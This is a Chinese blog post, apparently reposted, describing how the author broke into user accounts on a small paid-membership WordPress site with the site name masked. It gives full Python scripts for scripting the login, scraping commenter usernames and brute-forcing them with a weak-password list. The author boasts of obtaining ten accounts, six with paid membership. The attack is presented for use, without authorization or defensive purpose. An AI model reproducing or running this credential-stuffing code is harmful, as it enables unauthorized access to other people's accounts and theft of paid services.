怎么破解私人充值网站 小伙利用Python爆破某会员网站

怎么破解私人充值网站 小伙利用Python爆破某会员网站-熊猫号

寒假在家上网,qq群里一位好友给我说他想要某个网站的会员,ps(是个小网站),本着助人为乐的精神我去踩了点。。。

怎么破解私人充值网站 小伙利用Python爆破某会员网站-熊猫号

是吗

然后就有了思路(骚操作)

这是小编准备的python学习资料,为了你们更好的学习python,关注,转发,私信小编“01”即可免费领取!

怎么破解私人充值网站 小伙利用Python爆破某会员网站-熊猫号

先讲一下思路

1 .先注册用户登录

2.flidder抓包

3.python 模拟登录

4.在评论区抓取评论的用户名

5.弱密码爆破

登录

登录页面如下

怎么破解私人充值网站 小伙利用Python爆破某会员网站-熊猫号

登录页面.png

flidder抓包

抓包之后发现有以下几个字段

 'log': 'admin', # 用户名
 'pwd': 'admin', # 密码 
 'wp-submit': '登录',
 'redirect_to': '',
 'wpuf_login': 'true',
 'action': 'login',
 '_wpnonce': '4b4e82f670',
 '_wp_http_referer': '/%e7%99%bb%e5%bd%95?loggedout=true'

只要用户名和密码不同,其他的不变

python 模拟登录

这部分就比较简单,用到requests模块

import re
import requests
def baopo(log):
 url = 'http://XXXXXX.com/%e7%99%bb%e5%bd%95'
 headers = {
 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
 'Referer': 'http://XXXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true' #网站打码
 }
 data = {
 'log': log,
 'pwd': 'admin',
 'wp-submit': '登录',
 'redirect_to': '',
 'wpuf_login': 'true',
 'action': 'login',
 '_wpnonce': '4b4e82f670',
 '_wp_http_referer': '/%e7%99%bb%e5%bd%95?loggedout=true'
 }
 a = requests.post(url, headers=headers, data=data)
 if a.history == []:
 return False
 else:
 return True

得到用户名

这部分主要用到正则模块匹配就行了

import re
import requests
def gethtml(url):
 headers = {
 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
 'Referer': 'http://XXXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true'
 }
 html = requests.get(url, headers=headers)
 return html.text
for i in range(30,36):
 if i == 1:
 url = 'http:/XXXXXX.com/'
 else:
 url = 'http://XXXXXXX.com/page/' + str(i)
 html = gethtml(url)
 for each in re.findall('<a href="(.*?)" class="zoom" rel="bookmark"', html):
 print(each)
 if int(each[-4:].replace('/','').replace('s','')) < 100:
 for each2 in re.findall('<strong>(.*?)</strong>:', gethtml(each)):
 if 'href' in each2:
 each2 = re.findall("class='url'>(.*?)</a>", each2)[0]
 f = open('yonghu.txt','a+',encoding='utf-8')
 f.write(each2)
 f.write('
')
 f.close()
 print(each2)

得到用户名保存在yonghu.txt文件里

开始爆破

本来想加上多线程,但因为网站太垃圾了,访问过快会限制,那就算了吧。。。

import requests

import multiprocessing

def baopo(log):

url = ‘http://XXXXX.com/%e7%99%bb%e5%bd%95’

headers = {

‘User-Agent’: ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0’,

‘Referer’: ‘http://XXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true’

}

pwd =[‘000000′,’111111′,’11111111′,’112233′,’123123′,’123321′,’123456′,’12345678′,’654321′,’666666′,’888888′,’abcdef’,’abcabc’,

‘abc123′,’a1b2c3′,’aaa111′,’123qwe’,’qwerty’,’qweasd’,’admin’,

‘password’,’p@ssword’,’passwd’,’iloveyou’,’5201314′,’88888888′,’147258369′,’1234567890′]

pwd.append(log)

for each in pwd:

print(‘using>>>’+each)

data = {

‘log’: log,

‘pwd’: each,

‘wp-submit’: ‘登录’,

‘redirect_to’: ”,

‘wpuf_login’: ‘true’,

‘action’: ‘login’,

‘_wpnonce’: ‘4b4e82f670’,

‘_wp_http_referer’: ‘/%e7%99%bb%e5%bd%95?loggedout=true’

}

a = requests.post(url, headers=headers, data=data)

if a.history == []:

continue

else:

f = open(‘success.txt’,’a+’,encoding=’utf-8′)

f.write(‘User:’)

f.write(log)

f.write(‘ Passwd:’)

f.write(each)

print(‘succeed! ‘)

return True

f = open(‘yonghu.txt’,’r’, encoding=’utf-8′)

yonghuming = set()

yonghuming.add(‘adminn’)

for line in f.readlines():

line = line.strip()

yonghuming.add(line)

if __name__ == ‘__main__’:

for each in yonghuming:

#p = multiprocessing.Process(target=baopo, args=(each,))

#p.start()

print(each)

baopo(each)

#print(yonghuming)

运行效果图

怎么破解私人充值网站 小伙利用Python爆破某会员网站-熊猫号

运行效果

怎么破解私人充值网站 小伙利用Python爆破某会员网站-熊猫号

成功爆破

收获

怎么破解私人充值网站 小伙利用Python爆破某会员网站-熊猫号

timg.jpg

放在服务器上跑了一晚,爆出来10个账号,其中6个充值了会员,美吱吱

怎么破解私人充值网站 小伙利用Python爆破某会员网站-熊猫号

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2476560997@qq.com 举报,一经查实,本站将立刻删除。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 2022年3月12日 7:16 上午
下一篇 2022年3月12日 7:19 上午

相关推荐

  • qq号和密码都忘记了怎么办 手把手教你找回忘记密码也换了手机号的QQ号

    我有2个这样的QQ号,分别是距今有6年,和11年登录不上,这期间,尝试过几次都找不回来,差点就放弃了,好在一直坚持着 废话不多说,上教程!!! ①首先打开登录页面,输入你忘记密码的QQ号,前提是要记得你的QQ号,然后点下面的忘记密码。 ②然后,有个身份验证,直接点资料辅助验证。 ③按要求逐一填写完成,填写你现在正在使用的手机号。 ④身份验证完成后(手机号,姓…

    2022年4月26日
    146
  • bitlocker强制破解 三种思路巧妙破解Bitlocker加密

    课前提要 BitLocker加密是Windows的一种数据保护功能,主要用于解决由于计算机设备的物理丢失导致的数据失窃或恶意泄漏,能够同时支持FAT和NTFS两种格式,可以加密电脑的整个系统分区,也可以加密可移动的便携存储设备,如U盘和移动硬盘等。 BitLocker使用AES(高级加密标准/Advanced Encryption Standard)128位…

    2022年3月12日
    415
  • innodb恢复数据 数据库InnoDB崩溃恢复机制

    概述 数据库系统与文件系统最大的区别在于数据库能保证操作的原子性,一个操作要么不做要么都做,即使在数据库宕机的情况下,也不会出现操作一半的情况,这个就需要数据库的日志和一套完善的崩溃恢复机制来保证。下面简单介绍一下InnoDB的崩溃恢复流程。 相关概念 lsn: 可以理解为数据库从创建以来产生的redo日志量,这个值越大,说明数据库的更新越多,也可…

    2022年3月12日
    43
  • 云主机平台搭建 如何搭建一个专属云平台

    物联网的出现,实现了人与物、物与物的沟通交流,打造了一个万物互联的智能世界。 在四层物联网模型中,主要分为感知层、网络层、平台层、应用层四大层级。 其中,云平台是网络架构和产业链条中的关键枢纽,它就像物联网体系里的大脑,承载并运算着万物互联后产生的庞大数据,发挥出巨大价值。 云平台搭建,是完成智能应用的必要环节之一。 云平台搭建之前,需要做哪些准备工作? 不…

    2022年3月12日
    63
  • address解决方法 程序运行Address的解决方法

    ★问题描述★: 我们打开某个程序(.EXE后缀的可执行文件)时提示:Access ViolatiOn At Address xxxxxxxxx,每个程序出现的代码也不一致。 今天在架设**世界的服务器端时,提示要运行EasyWeb程序,但双击运行该程序时提示:Access violation at address 004C0B3D,随即我们通过一系列操作让E…

    2022年3月12日
    48
  • 相似图片识图 百度识图查找图源及相似图

    搜索引擎是大家日常生活经常使用的工具,遇到不了解的事就搜一下,很方便。但有时候,如果根本不知道要搜索的东西是什么,就很难去搜索。对此,我们可以以图搜图,用图片去搜索,解决上述难题。 地址:参见文末图 在“百度识图”可以直接上传图片,即可开始搜索。官方给出的应用范围包括商品、素材、植物、人物、风景等。 ONETer用Windows11的默认桌面作为搜索图,搜索…

    2022年3月12日
    126
  • 大屏数据可视化前端 从0-1制作数据可视化大屏

    都说「数不如图」,在数据报告中,就常常借助图形化的手段将数据清晰表达出来,可以更简单有效地传达和沟通。 这两年,数据可视化大屏在数据报告中的占比越来越大,企业和政府会更倾向于选择炫酷大屏进行数据分析展示。炫酷大屏不仅能实时监控重点数据,提高决策效率,放在公司会议室,展台等地方,还能提升公司形象。 作为一个从事可视化大屏项目3年多的秃头技术,做过大大小小几十个…

    2022年3月12日
    358

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

返回顶部